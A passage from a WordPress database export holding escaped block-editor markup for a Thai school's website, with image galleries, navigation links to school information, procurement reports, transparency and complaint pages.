href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 13:41:33','2025-07-03 06:41:33','',459,'http://pakhaeng.ssk.in.th/?p=1663',0,'revision','',0),
(1664,1,'2025-07-03 14:39:14','2025-07-03 07:39:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 